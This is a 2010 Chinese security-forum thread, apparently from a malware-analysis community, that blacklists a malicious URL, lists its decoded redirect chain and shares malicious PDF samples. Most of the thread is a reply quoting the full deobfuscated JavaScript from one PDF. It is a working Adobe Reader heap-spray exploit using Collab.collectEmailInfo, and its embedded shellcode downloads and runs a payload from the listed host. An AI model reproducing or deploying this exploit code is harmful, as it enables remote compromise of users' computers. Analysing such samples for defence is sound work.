1   1  /  1  页   跳转

[黑名单] http://leimop.in/nte/CORV.html

http://leimop.in/nte/CORV.html



引用:

关于:hxxp://leimop.in/nte/CORV.html解密的日志(全体输出 -  9):

Level  0>http://leimop.in/nte/CORV.html
Level  1>http://leimop.in/nte/CORV.html/wHf7ff04faV0100f060006Rff8f600a102Tbba704ba
Level  2>http://leimop.in/nte/CORV.html/yH07cb74cfV0100f060006Rff8f600a102Tbba70453303
Level  2>http://leimop.in/nte/CORV.html/yH07cb74cfV0100f060006Rff8f600a102Tbba70453302
Level  2>http://leimop.in/nte/CORV.html/xH07cb74cfV0100f060006Rff8f600a102Tbba70453324
Level  3>http://leimop.in/nte/CORV.html/yH07cb74cfV0100f060006Rff8f600a102T4b93758f324
Level  2>http://leimop.in/nte/CORV.html/xH07cb74cfV0100f060006Rff8f600a102Tbba70453317
Level  2>http://leimop.in/nte/CORV.html/xH07cb74cfV0100f060006Rff8f600a102Tbba70453303
Level  2>http://leimop.in/nte/CORV.html/xH07cb74cfV0100f060006Rff8f600a102Tbba70453326

analyzed by 是昔流芳


2个PDF,大家玩玩吧

话说论坛也该开放 7z 扩展名的附件上传吧

用户系统信息:Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8

附件附件:

文件名:pdf.zip
下载次数:207
文件类型:application/x-zip-compressed
文件大小:
上传时间:2010-8-3 20:15:34
描述:zip

分享到:
gototop
 

回复:http://leimop.in/nte/CORV.html

recode不会用 啥加密方式也看不明白。需要多多学习
gototop
 

回复: http://leimop.in/nte/CORV.html

第一个PDF.

var Vvej_wIx = new Array();
var u8SWp_1d7 = 0;
var U_3F_KoylQ_i = "";
function G6uQ3W4M5(jo84w3k, K4_3_3n_0nol)
{
var P5abg__gNsj = K4_3_3n_0nol.toString();
var aX1a06jm = "";
for(var KP__M2 = 0; KP__M2 < P5abg__gNsj.length; KP__M2++)
{
var OB_M_ci = parseInt(P5abg__gNsj.substr(KP__M2, 1));
if (!isNaN(OB_M_ci))
{
OB_M_ci = OB_M_ci.toString(16);
if (OB_M_ci.length == 1)
{
OB_M_ci = "0" + OB_M_ci;
}
else if (OB_M_ci.length != 2)
{
OB_M_ci = "00";
}
aX1a06jm = OB_M_ci + aX1a06jm;
}
}
while(aX1a06jm.length < 8)
{
aX1a06jm = "0" + aX1a06jm;
}
var U0jiqi__Ul = jo84w3k.toString(16);
if (U0jiqi__Ul.length == 1)
{
U0jiqi__Ul = "0" + U0jiqi__Ul;
}
else if (U0jiqi__Ul.length != 2)
{
U0jiqi__Ul = "00";
}
aX1a06jm = "3" + U0jiqi__Ul + "P" + aX1a06jm;
return aX1a06jm;
}
function dI_X78Nb(B_8P8fE__rei, apGd_cYAOY_1CI4)
{
var e4_43M_R_ht = new Array("");
var xc_w_g2egEF8c = B_8P8fE__rei;
var JH8_m2JR_c;
if ((JH8_m2JR_c = B_8P8fE__rei.lastIndexOf("%u00")) != -1)
{
if (JH8_m2JR_c + 6 == B_8P8fE__rei.length)
{
e4_43M_R_ht[0] = B_8P8fE__rei.substr(JH8_m2JR_c + 4, 2);
xc_w_g2egEF8c = B_8P8fE__rei.substring(0, JH8_m2JR_c);
}
}
JH8_m2JR_c = 1;
for (KP__M2 = 0; KP__M2 < apGd_cYAOY_1CI4.length; KP__M2++)
{
var US_6f__v = apGd_cYAOY_1CI4.charCodeAt(KP__M2).toString(16);
if (US_6f__v.length == 1)
{
US_6f__v = "0" + US_6f__v;
}
e4_43M_R_ht[JH8_m2JR_c] = US_6f__v;
JH8_m2JR_c++;
}
KP__M2 = e4_43M_R_ht[0].length ? 0 : 1;
e4_43M_R_ht[JH8_m2JR_c] = "00";
e4_43M_R_ht[JH8_m2JR_c + 1] = "00";
JH8_m2JR_c += 2;
if ((e4_43M_R_ht.length - KP__M2) % 2)
{
e4_43M_R_ht[JH8_m2JR_c] = "00";
}
while(KP__M2 < e4_43M_R_ht.length)
{
xc_w_g2egEF8c += "%u" + e4_43M_R_ht[KP__M2 + 1] + e4_43M_R_ht[KP__M2];
KP__M2 += 2;
}
xc_w_g2egEF8c += "%u0000";
return xc_w_g2egEF8c;
}
function S_Xx_g(COLT1CVp, HYJdIB5qr_3_do)
{
while (COLT1CVp.length*2<HYJDIB5QR_3_DO)
{
COLT1CVp += COLT1CVp;
}
COLT1CVp = COLT1CVp.substring(0,HYJdIB5qr_3_do/2);
return COLT1CVp;
}
function W7____3VlXx(d4_q__7L, vt_KEm, A_dsuv)
{
var S_6i5y_4B___K7q = 0x0c0c0c0c;
var COLT1CVp = unescape(vt_KEm);
var apGd_cYAOY_1CI4 = G6uQ3W4M5(d4_q__7L, A_dsuv);
var fJ1CgjD37m3M = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");
var B_8P8fE__rei = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%ufbe9%u0000%u5f00%ua164%u0030%u0000%u408b%u8b0c%u1c70%u8bad%u2068%u7d80%u330c%u0374%ueb96%u8bf3%u0868%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%uf238%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%u00e8%uffff%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u6770%u4279%u6253%u4c6b%u0062%u7468%u7074%u2f3a%u6c2f%u6965%u6f6d%u2e70%u6e69%u6e2f%u6574%u432f%u524f%u2e56%u7468%u6c6d%u792f%u3548%u6333%u6439%u3732%u5661%u3130%u3030%u3066%u3036%u3030%u5236%u6666%u6638%u3036%u6130%u3031%u5432%u6234%u3339%u3637%u6364";
app.G_Ts35 = unescape(dI_X78Nb(B_8P8fE__rei, apGd_cYAOY_1CI4));
var CfOT66Krwe = 0x400000;
var R1EwE18 = fJ1CgjD37m3M.length * 2;
var HYJdIB5qr_3_do = CfOT66Krwe - (R1EwE18+0x38);
COLT1CVp = S_Xx_g(COLT1CVp, HYJdIB5qr_3_do);
var U86jeC6r_667 = (S_6i5y_4B___K7q - 0x400000)/CfOT66Krwe;
for (var U11___wpg_1nB = 0; U11___wpg_1nB < U86jeC6r_667; U11___wpg_1nB++)
{
Vvej_wIx[U11___wpg_1nB] = COLT1CVp + fJ1CgjD37m3M;
}
}
function q060nD_U6_f()
{
var Do3U0UV = "";
for (KP__M2 = 0; KP__M2 < 12; KP__M2++)
{
Do3U0UV += unescape("%u0c0c%u0c0c");
}
var HR2R__8_Nh = "";
for (KP__M2 = 0; KP__M2 < 750; KP__M2++)
{
HR2R__8_Nh += Do3U0UV;
}
this.collabStore = Collab.collectEmailInfo(
{
subj: "", msg: HR2R__8_Nh
}
);
app.clearTimeOut(u8SWp_1d7);
}
function m_4_Y53_wFW(CNQK_R__b)
{
var Yvb__dJ6Ka7pSd = u8SWp_1d7;
if ((CNQK_R__b >= 8 && CNQK_R__b < 8.11) || CNQK_R__b < 7.1)
{
W7____3VlXx(23, "%u0c0c%u0c0c", CNQK_R__b);
q060nD_U6_f();
}
if (Yvb__dJ6Ka7pSd)
{
app.clearTimeOut(Yvb__dJ6Ka7pSd);
}
}
var A_dsuv = 0;
var pa26_4Kl = app.plugIns;
for (var r1D_WB = 0; r1D_WB < pa26_4Kl.length; r1D_WB++)
{
var COwfJvk = pa26_4Kl[r1D_WB].version;
if (COwfJvk > A_dsuv)
{
A_dsuv = COwfJvk;
}
}
if (app.viewerVersion == 9.103 && A_dsuv < 9.13)
{
A_dsuv = 9.13;
}
app.rd_vcWegv3b88l = m_4_Y53_wFW;
u8SWp_1d7 = app.setTimeOut("app.rd_vcWegv3b88l(" + A_dsuv.toString() + ")", 50);


gototop
 

回复: http://leimop.in/nte/CORV.html

recode

解压以后显示这个,完全看不懂 就没下文了 求解密方法


gototop
 

回复:http://leimop.in/nte/CORV.html

分析数据流就明显了。
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT